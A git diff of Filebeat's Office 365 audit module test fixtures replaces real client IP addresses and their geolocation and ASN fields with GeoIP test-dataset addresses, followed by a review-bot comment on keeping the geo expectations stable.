 "o365.audit.CorrelationId": "fd39a89f-9050-2000-7abb-ce79fabfa6c0",
 "o365.audit.CreationTime": "2021-02-05T09:08:17",
 "o365.audit.DoNotDistributeEvent": true,
@@ -2345,20 +2309,18 @@
 "o365.audit.WebId": "3b387d63-522a-4745-bcc8-4107d92b8840",
 "o365.audit.Workload": "SharePoint",
 "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
- "related.ip": "51.141.50.227",
+ "related.ip": "175.16.199.1",
 "related.user": "app",
 "service.type": "o365",
- "source.as.number": 8075,
- "source.as.organization.name": "Microsoft Corporation",
- "source.geo.city_name": "Cardiff",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "GB",
- "source.geo.country_name": "United Kingdom",
- "source.geo.location.lat": 51.4975,
- "source.geo.location.lon": -3.2004,
- "source.geo.region_iso_code": "GB-CRF",
- "source.geo.region_name": "Cardiff",
- "source.ip": "51.141.50.227",
+ "source.geo.city_name": "Changchun",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "CN",
+ "source.geo.country_name": "China",
+ "source.geo.location.lat": 43.88,
+ "source.geo.location.lon": 125.3228,
+ "source.geo.region_iso_code": "CN-22",
+ "source.geo.region_name": "Jilin Sheng",
+ "source.ip": "175.16.199.1",
 "tags": [
 "forwarded"
 ],
@@ -2372,8 +2334,8 @@
 },
 {
 "@timestamp": "2021-02-05T09:08:17.000Z",
- "client.address": "51.141.50.227",
- "client.ip": "51.141.50.227",
+ "client.address": "175.16.199.1",
+ "client.ip": "175.16.199.1",
 "event.action": "ListColumnUpdated",
 "event.category": "web",
 "event.code": "SharePointFieldOperation",
@@ -2388,11 +2350,11 @@
 "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
 "host.name": "sharepoint",
 "input.type": "log",
- "log.offset": 33305,
+ "log.offset": 33276,
 "network.type": "ipv4",
 "o365.audit.ApplicationDisplayName": "OneNote",
 "o365.audit.ApplicationId": "2d4d3d8e-2be3-4bef-9f87-7875a61c29de",
- "o365.audit.ClientIP": "51.141.50.227",
+ "o365.audit.ClientIP": "175.16.199.1",
 "o365.audit.CorrelationId": "fd39a89f-9050-2000-7abb-ce79fabfa6c0",
 "o365.audit.CreationTime": "2021-02-05T09:08:17",
 "o365.audit.DoNotDistributeEvent": true,
@@ -2422,20 +2384,18 @@
 "o365.audit.WebId": "3b387d63-522a-4745-bcc8-4107d92b8840",
 "o365.audit.Workload": "SharePoint",
 "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
- "related.ip": "51.141.50.227",
+ "related.ip": "175.16.199.1",
 "related.user": "app",
 "service.type": "o365",
- "source.as.number": 8075,
- "source.as.organization.name": "Microsoft Corporation",
- "source.geo.city_name": "Cardiff",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "GB",
- "source.geo.country_name": "United Kingdom",
- "source.geo.location.lat": 51.4975,
- "source.geo.location.lon": -3.2004,
- "source.geo.region_iso_code": "GB-CRF",
- "source.geo.region_name": "Cardiff",
- "source.ip": "51.141.50.227",
+ "source.geo.city_name": "Changchun",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "CN",
+ "source.geo.country_name": "China",
+ "source.geo.location.lat": 43.88,
+ "source.geo.location.lon": 125.3228,
+ "source.geo.region_iso_code": "CN-22",
+ "source.geo.region_name": "Jilin Sheng",
+ "source.ip": "175.16.199.1",
 "tags": [
 "forwarded"
 ],
@@ -2449,8 +2409,8 @@
 },
 {
 "@timestamp": "2021-02-05T09:08:17.000Z",
- "client.address": "51.141.50.227",
- "client.ip": "51.141.50.227",
+ "client.address": "175.16.199.1",
+ "client.ip": "175.16.199.1",
 "event.action": "ListColumnUpdated",
 "event.category": "web",
 "event.code": "SharePointFieldOperation",
@@ -2465,11 +2425,11 @@
 "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
 "host.name": "sharepoint",
 "input.type": "log",
- "log.offset": 34396,
+ "log.offset": 34366,
 "network.type": "ipv4",
 "o365.audit.ApplicationDisplayName": "OneNote",
 "o365.audit.ApplicationId": "2d4d3d8e-2be3-4bef-9f87-7875a61c29de",
- "o365.audit.ClientIP": "51.141.50.227",
+ "o365.audit.ClientIP": "175.16.199.1",
 "o365.audit.CorrelationId": "fd39a89f-9050-2000-7abb-ce79fabfa6c0",
 "o365.audit.CreationTime": "2021-02-05T09:08:17",
 "o365.audit.DoNotDistributeEvent": true,
@@ -2499,20 +2459,18 @@
 "o365.audit.WebId": "3b387d63-522a-4745-bcc8-4107d92b8840",
 "o365.audit.Workload": "SharePoint",
 "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
- "related.ip": "51.141.50.227",
+ "related.ip": "175.16.199.1",
 "related.user": "app",
 "service.type": "o365",
- "source.as.number": 8075,
- "source.as.organization.name": "Microsoft Corporation",
- "source.geo.city_name": "Cardiff",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "GB",
- "source.geo.country_name": "United Kingdom",
- "source.geo.location.lat": 51.4975,
- "source.geo.location.lon": -3.2004,
- "source.geo.region_iso_code": "GB-CRF",
- "source.geo.region_name": "Cardiff",
- "source.ip": "51.141.50.227",
+ "source.geo.city_name": "Changchun",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "CN",
+ "source.geo.country_name": "China",
+ "source.geo.location.lat": 43.88,
+ "source.geo.location.lon": 125.3228,
+ "source.geo.region_iso_code": "CN-22",
+ "source.geo.region_name": "Jilin Sheng",
+ "source.ip": "175.16.199.1",
 "tags": [
 "forwarded"
 ],
@@ -2526,8 +2484,8 @@
 },
 {
 "@timestamp": "2021-02-05T09:08:17.000Z",
- "client.address": "51.141.50.227",
- "client.ip": "51.141.50.227",
+ "client.address": "175.16.199.1",
+ "client.ip": "175.16.199.1",
 "event.action": "ListColumnUpdated",
 "event.category": "web",
 "event.code": "SharePointFieldOperation",
@@ -2542,11 +2500,11 @@
 "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
 "host.name": "sharepoint",
 "input.type": "log",
- "log.offset": 35487,
+ "log.offset": 35456,
 "network.type": "ipv4",
 "o365.audit.ApplicationDisplayName": "OneNote",
 "o365.audit.ApplicationId": "2d4d3d8e-2be3-4bef-9f87-7875a61c29de",
- "o365.audit.ClientIP": "51.141.50.227",
+ "o365.audit.ClientIP": "175.16.199.1",
 "o365.audit.CorrelationId": "fd39a89f-9050-2000-7abb-ce79fabfa6c0",
 "o365.audit.CreationTime": "2021-02-05T09:08:17",
 "o365.audit.DoNotDistributeEvent": true,
@@ -2576,20 +2534,18 @@
 "o365.audit.WebId": "3b387d63-522a-4745-bcc8-4107d92b8840",
 "o365.audit.Workload": "SharePoint",
 "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
- "related.ip": "51.141.50.227",
+ "related.ip": "175.16.199.1",
 "related.user": "app",
 "service.type": "o365",
- "source.as.number": 8075,
- "source.as.organization.name": "Microsoft Corporation",
- "source.geo.city_name": "Cardiff",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "GB",
- "source.geo.country_name": "United Kingdom",
- "source.geo.location.lat": 51.4975,
- "source.geo.location.lon": -3.2004,
- "source.geo.region_iso_code": "GB-CRF",
- "source.geo.region_name": "Cardiff",
- "source.ip": "51.141.50.227",
+ "source.geo.city_name": "Changchun",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "CN",
+ "source.geo.country_name": "China",
+ "source.geo.location.lat": 43.88,
+ "source.geo.location.lon": 125.3228,
+ "source.geo.region_iso_code": "CN-22",
+ "source.geo.region_name": "Jilin Sheng",
+ "source.ip": "175.16.199.1",
 "tags": [
 "forwarded"
 ],
@@ -2603,8 +2559,8 @@
 },
 {
 "@timestamp": "2021-02-05T09:06:07.000Z",
- "client.address": "79.159.11.115",
- "client.ip": "79.159.11.115",
+ "client.address": "89.160.20.112",
+ "client.ip": "89.160.20.112",
 "event.action": "UserLoggedIn",
 "event.category": "authentication",
 "event.code": "AzureActiveDirectoryStsLogon",
@@ -2622,7 +2578,7 @@
 "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
 "host.name": "testsiem4.onmicrosoft.com",
 "input.type": "log",
- "log.offset": 36578,
+ "log.offset": 36546,
 "network.type": "ipv4",
 "o365.audit.Actor": [
 {
@@ -2635,10 +2591,10 @@
 }
 ],
 "o365.audit.ActorContextId": "48622b8f-44d3-420c-b4a2-510c8165767e",
- "o365.audit.ActorIpAddress": "79.159.11.115",
+ "o365.audit.ActorIpAddress": "89.160.20.112",
 "o365.audit.ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7",
 "o365.audit.AzureActiveDirectoryEventType": 1,
- "o365.audit.ClientIP": "79.159.11.115",
+ "o365.audit.ClientIP": "89.160.20.112",
 "o365.audit.CreationTime": "2021-02-05T09:06:07",
 "o365.audit.ErrorNumber": "0",
 "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize",
@@ -2666,20 +2622,20 @@
 "o365.audit.Version": 1,
 "o365.audit.Workload": "AzureActiveDirectory",
 "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
- "related.ip": "79.159.11.115",
+ "related.ip": "89.160.20.112",
 "related.user": "root",
 "service.type": "o365",
- "source.as.number": 3352,
- "source.as.organization.name": "Telefonica De Espana",
- "source.geo.city_name": "Barcelona",
+ "source.as.number": 29518,
+ "source.as.organization.name": "Bredband2 AB",
+ "source.geo.city_name": "Link\u00f6ping",
 "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "79.159.11.115",
+ "source.geo.country_iso_code": "SE",
+ "source.geo.country_name": "Sweden",
+ "source.geo.location.lat": 58.4167,
+ "source.geo.location.lon": 15.6167,
+ "source.geo.region_iso_code": "SE-E",
+ "source.geo.region_name": "\u00d6sterg\u00f6tland County",
+ "source.ip": "89.160.20.112",
 "tags": [
 "forwarded"
 ],
@@ -2697,8 +2653,8 @@
 },
 {
 "@timestamp": "2021-02-05T09:06:08.000Z",
- "client.address": "79.159.11.115",
- "client.ip": "79.159.11.115",
+ "client.address": "89.160.20.112",
+ "client.ip": "89.160.20.112",
 "event.action": "UserLoggedIn",
 "event.category": "authentication",
 "event.code": "AzureActiveDirectoryStsLogon",
@@ -2716,7 +2672,7 @@
 "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
 "host.name": "testsiem4.onmicrosoft.com",
 "input.type": "log",
- "log.offset": 37782,
+ "log.offset": 37750,
 "network.type": "ipv4",
 "o365.audit.Actor": [
 {
@@ -2729,10 +2685,10 @@
 }
 ],
 "o365.audit.ActorContextId": "48622b8f-44d3-420c-b4a2-510c8165767e",
- "o365.audit.ActorIpAddress": "79.159.11.115",
+ "o365.audit.ActorIpAddress": "89.160.20.112",
 "o365.audit.ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7",
 "o365.audit.AzureActiveDirectoryEventType": 1,
- "o365.audit.ClientIP": "79.159.11.115",
+ "o365.audit.ClientIP": "89.160.20.112",
 "o365.audit.CreationTime": "2021-02-05T09:06:08",
 "o365.audit.ErrorNumber": "0",
 "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize",
@@ -2760,20 +2716,20 @@ "o365.audit.Version": 1, "o365.audit.Workload": "AzureActiveDirectory", "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e", - "related.ip": "79.159.11.115", + "related.ip": "89.160.20.112", "related.user": "root", "service.type": "o365", - "source.as.number": 3352, - "source.as.organization.name": "Telefonica De Espana", - "source.geo.city_name": "Barcelona", + "source.as.number": 29518, + "source.as.organization.name": "Bredband2 AB", + "source.geo.city_name": "Link\u00f6ping", "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "79.159.11.115", + "source.geo.country_iso_code": "SE", + "source.geo.country_name": "Sweden", + "source.geo.location.lat": 58.4167, + "source.geo.location.lon": 15.6167, + "source.geo.region_iso_code": "SE-E", + "source.geo.region_name": "\u00d6sterg\u00f6tland County", + "source.ip": "89.160.20.112", "tags": [ "forwarded" ], @@ -2791,8 +2747,8 @@ }, { "@timestamp": "2021-02-05T09:06:34.000Z", - "client.address": "79.159.11.115", - "client.ip": "79.159.11.115", + "client.address": "89.160.20.112", + "client.ip": "89.160.20.112", "event.action": "UserLoggedIn", "event.category": "authentication", "event.code": "AzureActiveDirectoryStsLogon", @@ -2810,7 +2766,7 @@ "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", "host.name": "testsiem4.onmicrosoft.com", "input.type": "log", - "log.offset": 39044, + "log.offset": 39012, "network.type": "ipv4", "o365.audit.Actor": [ { 
@@ -2823,10 +2779,10 @@ } ], "o365.audit.ActorContextId": "48622b8f-44d3-420c-b4a2-510c8165767e", - "o365.audit.ActorIpAddress": "79.159.11.115", + "o365.audit.ActorIpAddress": "89.160.20.112", "o365.audit.ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "o365.audit.AzureActiveDirectoryEventType": 1, - "o365.audit.ClientIP": "79.159.11.115", + "o365.audit.ClientIP": "89.160.20.112", "o365.audit.CreationTime": "2021-02-05T09:06:34", "o365.audit.ErrorNumber": "0", "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize", @@ -2854,20 +2810,20 @@ "o365.audit.Version": 1, "o365.audit.Workload": "AzureActiveDirectory", "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e", - "related.ip": "79.159.11.115", + "related.ip": "89.160.20.112", "related.user": "root", "service.type": "o365", - "source.as.number": 3352, - "source.as.organization.name": "Telefonica De Espana", - "source.geo.city_name": "Barcelona", + "source.as.number": 29518, + "source.as.organization.name": "Bredband2 AB", + "source.geo.city_name": "Link\u00f6ping", "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "79.159.11.115", + "source.geo.country_iso_code": "SE", + "source.geo.country_name": "Sweden", + "source.geo.location.lat": 58.4167, + "source.geo.location.lon": 15.6167, + "source.geo.region_iso_code": "SE-E", + "source.geo.region_name": "\u00d6sterg\u00f6tland County", + "source.ip": "89.160.20.112", "tags": [ "forwarded" ], @@ -2885,8 +2841,8 @@ }, { "@timestamp": "2021-02-05T09:06:07.000Z", - "client.address": "79.159.11.115", - "client.ip": "79.159.11.115", + "client.address": "89.160.20.112", + "client.ip": "89.160.20.112", "event.action": "UserLoggedIn", "event.category": "authentication", "event.code": "AzureActiveDirectoryStsLogon", 
@@ -2904,7 +2860,7 @@ "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", "host.name": "testsiem4.onmicrosoft.com", "input.type": "log", - "log.offset": 40306, + "log.offset": 40274, "network.type": "ipv4", "o365.audit.Actor": [ { @@ -2917,10 +2873,10 @@ } ], "o365.audit.ActorContextId": "48622b8f-44d3-420c-b4a2-510c8165767e", - "o365.audit.ActorIpAddress": "79.159.11.115", + "o365.audit.ActorIpAddress": "89.160.20.112", "o365.audit.ApplicationId": "00000002-0000-0ff1-ce00-000000000000", "o365.audit.AzureActiveDirectoryEventType": 1, - "o365.audit.ClientIP": "79.159.11.115", + "o365.audit.ClientIP": "89.160.20.112", "o365.audit.CreationTime": "2021-02-05T09:06:07", "o365.audit.ErrorNumber": "0", "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize", @@ -2948,20 +2904,20 @@ "o365.audit.Version": 1, "o365.audit.Workload": "AzureActiveDirectory", "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e", - "related.ip": "79.159.11.115", + "related.ip": "89.160.20.112", "related.user": "root", "service.type": "o365", - "source.as.number": 3352, - "source.as.organization.name": "Telefonica De Espana", - "source.geo.city_name": "Barcelona", + "source.as.number": 29518, + "source.as.organization.name": "Bredband2 AB", + "source.geo.city_name": "Link\u00f6ping", "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "79.159.11.115", + "source.geo.country_iso_code": "SE", + "source.geo.country_name": "Sweden", + "source.geo.location.lat": 58.4167, + "source.geo.location.lon": 15.6167, + "source.geo.region_iso_code": "SE-E", + "source.geo.region_name": "\u00d6sterg\u00f6tland County", + "source.ip": "89.160.20.112", "tags": [ "forwarded" ], 
@@ -2996,7 +2952,7 @@ "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", "host.name": "testsiem4.onmicrosoft.com", "input.type": "log", - "log.offset": 41567, + "log.offset": 41535, "o365.audit.Actor": [ { "ID": "21119711-1517-43d4-8138-b537dafad016", @@ -3097,7 +3053,7 @@ "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", "host.name": "testsiem4.onmicrosoft.com", "input.type": "log", - "log.offset": 43022, + "log.offset": 42990, "o365.audit.Actor": [ { "ID": "21119711-1517-43d4-8138-b537dafad016", @@ -3175,8 +3131,8 @@ }, { "@timestamp": "2021-02-05T09:05:59.000Z", - "client.address": "79.159.11.115", - "client.ip": "79.159.11.115", + "client.address": "89.160.20.112", + "client.ip": "89.160.20.112", "event.action": "UserLoginFailed", "event.category": "authentication", "event.code": "AzureActiveDirectoryStsLogon", @@ -3194,7 +3150,7 @@ "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", "host.name": "testsiem4.onmicrosoft.com", "input.type": "log", - "log.offset": 44362, + "log.offset": 44330, "network.type": "ipv4", "o365.audit.Actor": [ { @@ -3207,10 +3163,10 @@ } ], "o365.audit.ActorContextId": "48622b8f-44d3-420c-b4a2-510c8165767e", - "o365.audit.ActorIpAddress": "79.159.11.115", + "o365.audit.ActorIpAddress": "89.160.20.112", "o365.audit.ApplicationId": "4345a7b9-9a63-4910-a426-35363201d503", "o365.audit.AzureActiveDirectoryEventType": 1, - "o365.audit.ClientIP": "79.159.11.115", + "o365.audit.ClientIP": "89.160.20.112", "o365.audit.CreationTime": "2021-02-05T09:05:59", "o365.audit.ErrorNumber": "50072", "o365.audit.ExtendedProperties.RequestType": "Login:login", 
@@ -3240,20 +3196,20 @@ "o365.audit.Version": 1, "o365.audit.Workload": "AzureActiveDirectory", "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e", - "related.ip": "79.159.11.115", + "related.ip": "89.160.20.112", "related.user": "root", "service.type": "o365", - "source.as.number": 3352, - "source.as.organization.name": "Telefonica De Espana", - "source.geo.city_name": "Barcelona", + "source.as.number": 29518, + "source.as.organization.name": "Bredband2 AB", + "source.geo.city_name": "Link\u00f6ping", "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "79.159.11.115", + "source.geo.country_iso_code": "SE", + "source.geo.country_name": "Sweden", + "source.geo.location.lat": 58.4167, + "source.geo.location.lon": 15.6167, + "source.geo.region_iso_code": "SE-E", + "source.geo.region_name": "\u00d6sterg\u00f6tland County", + "source.ip": "89.160.20.112", "tags": [ "forwarded" ], @@ -3271,8 +3227,8 @@ }, { "@timestamp": "2021-02-05T09:05:59.000Z", - "client.address": "79.159.11.115", - "client.ip": "79.159.11.115", + "client.address": "89.160.20.112", + "client.ip": "89.160.20.112", "event.action": "UserLoginFailed", "event.category": "authentication", "event.code": "AzureActiveDirectoryStsLogon", @@ -3290,7 +3246,7 @@ "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", "host.name": "testsiem4.onmicrosoft.com", "input.type": "log", - "log.offset": 45730, + "log.offset": 45698, "network.type": "ipv4", "o365.audit.Actor": [ { 
@@ -3303,10 +3259,10 @@ } ], "o365.audit.ActorContextId": "48622b8f-44d3-420c-b4a2-510c8165767e", - "o365.audit.ActorIpAddress": "79.159.11.115", + "o365.audit.ActorIpAddress": "89.160.20.112", "o365.audit.ApplicationId": "4345a7b9-9a63-4910-a426-35363201d503", "o365.audit.AzureActiveDirectoryEventType": 1, - "o365.audit.ClientIP": "79.159.11.115", + "o365.audit.ClientIP": "89.160.20.112", "o365.audit.CreationTime": "2021-02-05T09:05:59", "o365.audit.ErrorNumber": "50072", "o365.audit.ExtendedProperties.RequestType": "Login:login", @@ -3336,20 +3292,20 @@ "o365.audit.Version": 1, "o365.audit.Workload": "AzureActiveDirectory", "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e", - "related.ip": "79.159.11.115", + "related.ip": "89.160.20.112", "related.user": "root", "service.type": "o365", - "source.as.number": 3352, - "source.as.organization.name": "Telefonica De Espana", - "source.geo.city_name": "Barcelona", + "source.as.number": 29518, + "source.as.organization.name": "Bredband2 AB", + "source.geo.city_name": "Link\u00f6ping", "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "79.159.11.115", + "source.geo.country_iso_code": "SE", + "source.geo.country_name": "Sweden", + "source.geo.location.lat": 58.4167, + "source.geo.location.lon": 15.6167, + "source.geo.region_iso_code": "SE-E", + "source.geo.region_name": "\u00d6sterg\u00f6tland County", + "source.ip": "89.160.20.112", "tags": [ "forwarded" ], @@ -3367,8 +3323,8 @@ }, { "@timestamp": "2021-02-05T09:06:07.000Z", - "client.address": "79.159.11.115", - "client.ip": "79.159.11.115", + "client.address": "89.160.20.112", + "client.ip": "89.160.20.112", "event.action": "UserLoggedIn", "event.category": "authentication", "event.code": "AzureActiveDirectoryStsLogon", 
@@ -3386,7 +3342,7 @@ "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", "host.name": "testsiem4.onmicrosoft.com", "input.type": "log", - "log.offset": 47098, + "log.offset": 47066, "network.type": "ipv4", "o365.audit.Actor": [ { @@ -3399,10 +3355,10 @@ } ], "o365.audit.ActorContextId": "48622b8f-44d3-420c-b4a2-510c8165767e", - "o365.audit.ActorIpAddress": "79.159.11.115", + "o365.audit.ActorIpAddress": "89.160.20.112", "o365.audit.ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "o365.audit.AzureActiveDirectoryEventType": 1, - "o365.audit.ClientIP": "79.159.11.115", + "o365.audit.ClientIP": "89.160.20.112", "o365.audit.CreationTime": "2021-02-05T09:06:07", "o365.audit.ErrorNumber": "0", "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize", @@ -3430,20 +3386,20 @@ "o365.audit.Version": 1, "o365.audit.Workload": "AzureActiveDirectory", "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e", - "related.ip": "79.159.11.115", + "related.ip": "89.160.20.112", "related.user": "root", "service.type": "o365", - "source.as.number": 3352, - "source.as.organization.name": "Telefonica De Espana", - "source.geo.city_name": "Barcelona", + "source.as.number": 29518, + "source.as.organization.name": "Bredband2 AB", + "source.geo.city_name": "Link\u00f6ping", "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "79.159.11.115", + "source.geo.country_iso_code": "SE", + "source.geo.country_name": "Sweden", + "source.geo.location.lat": 58.4167, + "source.geo.location.lon": 15.6167, + "source.geo.region_iso_code": "SE-E", + "source.geo.region_name": "\u00d6sterg\u00f6tland County", + "source.ip": "89.160.20.112", "tags": [ "forwarded" ], 
diff --git a/x-pack/filebeat/module/o365/audit/test/str-params.log b/x-pack/filebeat/module/o365/audit/test/str-params.log
index d5856330b9be..2ad00a12e478 100644
--- a/x-pack/filebeat/module/o365/audit/test/str-params.log
+++ b/x-pack/filebeat/module/o365/audit/test/str-params.log
@@ -1,2 +1,2 @@
 {"OriginatingServer": "HE1PR0102MB3228 (15.20.2707.017)", "ClientAppId": "", "OrganizationName": "testsiem.onmicrosoft.com", "ObjectId": "EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}", "Parameters": "-StartReceivedDate \"4/25/2021 7:00:00 AM\" -EndReceivedDate \"5/27/2021 7:00:00 AM\" -StartExpiresDate \"5/26/2021 7:00:00 AM\" -EndExpiresDate \"6/26/2021 7:00:00 AM\" -PageSize \"100\" -Page \"1\" -MyItems \"True\" -QuarantineTypes (\"Bulk\",\"Spam\",\"Phish\")", "Workload": "Exchange", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-07T20:49:49", "AppId": "", "UserId": "NT AUTHORITY\\SYSTEM (Microsoft.Exchange.ServiceHost)", "UserType": 3, "Version": 1, "ResultStatus": "True", "ExternalAccess": true, "UserKey": "NT AUTHORITY\\SYSTEM (Microsoft.Exchange.ServiceHost)", "Operation": "Set-Mailbox", "Id": "1c7412a6-858d-49ff-3f93-08d7ac0f45bf", "RecordType": 1}
-{"CreationTime":"2021-02-05T09:06:07","Id":"550ed0e2-27da-4cbc-9fb8-46add4018800","Operation":"UserLoggedIn","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":15,"ResultStatus":"Success","UserKey":"21119711-1517-43d4-8138-b537dafad016","UserType":0,"Version":1,"Workload":"AzureActiveDirectory","ClientIP":"79.159.11.115","ObjectId":"Unknown","UserId":"root@testsiem4.onmicrosoft.com","AzureActiveDirectoryEventType":1,"ExtendedProperties": "-Name \"foo\" -Description \"\" -HoldNames () -PublicFolderLocation () -ExchangeLocationExclusion () -IncludeUserAppContent \"True\" -SharePointLocationExclusion () -Force \"True\" -Language \"\" -SharePointLocation () -ExchangeLocation (\"All\") -ContentMatchQuery 
\"(c:c)(senderauthor=abc@foo.com)\"","ModifiedProperties":[],"Actor":[{"ID":"21119711-1517-43d4-8138-b537dafad016","Type":0},{"ID":"root@testsiem4.onmicrosoft.com","Type":5}],"ActorContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ActorIpAddress":"79.159.11.115","InterSystemsId":"df4c6d6c-4551-4f2d-8766-03700dfccb47","IntraSystemId":"550ed0e2-27da-4cbc-9fb8-46add4018800","SupportTicketId":"","Target":[{"ID":"Unknown","Type":0}],"TargetContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ApplicationId":"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7","ErrorNumber":"0"}
+{"CreationTime":"2021-02-05T09:06:07","Id":"550ed0e2-27da-4cbc-9fb8-46add4018800","Operation":"UserLoggedIn","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":15,"ResultStatus":"Success","UserKey":"21119711-1517-43d4-8138-b537dafad016","UserType":0,"Version":1,"Workload":"AzureActiveDirectory","ClientIP":"89.160.20.112","ObjectId":"Unknown","UserId":"root@testsiem4.onmicrosoft.com","AzureActiveDirectoryEventType":1,"ExtendedProperties": "-Name \"foo\" -Description \"\" -HoldNames () -PublicFolderLocation () -ExchangeLocationExclusion () -IncludeUserAppContent \"True\" -SharePointLocationExclusion () -Force \"True\" -Language \"\" -SharePointLocation () -ExchangeLocation (\"All\") -ContentMatchQuery \"(c:c)(senderauthor=abc@foo.com)\"","ModifiedProperties":[],"Actor":[{"ID":"21119711-1517-43d4-8138-b537dafad016","Type":0},{"ID":"root@testsiem4.onmicrosoft.com","Type":5}],"ActorContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ActorIpAddress":"89.160.20.112","InterSystemsId":"df4c6d6c-4551-4f2d-8766-03700dfccb47","IntraSystemId":"550ed0e2-27da-4cbc-9fb8-46add4018800","SupportTicketId":"","Target":[{"ID":"Unknown","Type":0}],"TargetContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ApplicationId":"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7","ErrorNumber":"0"}
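Review bot: The replacement address 89.160.20.112 on the `+` line carries no indication of why it was chosen, and the matching expected output in this change pins it to `source.geo.city_name: Linköping` and `source.as.organization.name: Bredband2 AB`, so the fixture now depends on that address resolving identically in whichever GeoIP/ASN database the module test harness loads. That city/ASN pairing looks like the one in MaxMind's published GeoLite2 test dataset, which would make the expectation stable, but that is inferred rather than visible here. Dropping the previous address, which the old expected output attributed to a residential ISP range, is the right call for a public fixture. A one-line note in the module's test README (or the PR description) saying that sample IPs must be taken from the GeoIP test dataset and that the `-expected.json` files are regenerated rather than hand-edited would keep the next contributor from substituting an arbitrary public address and silently breaking the geo and AS expectations.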
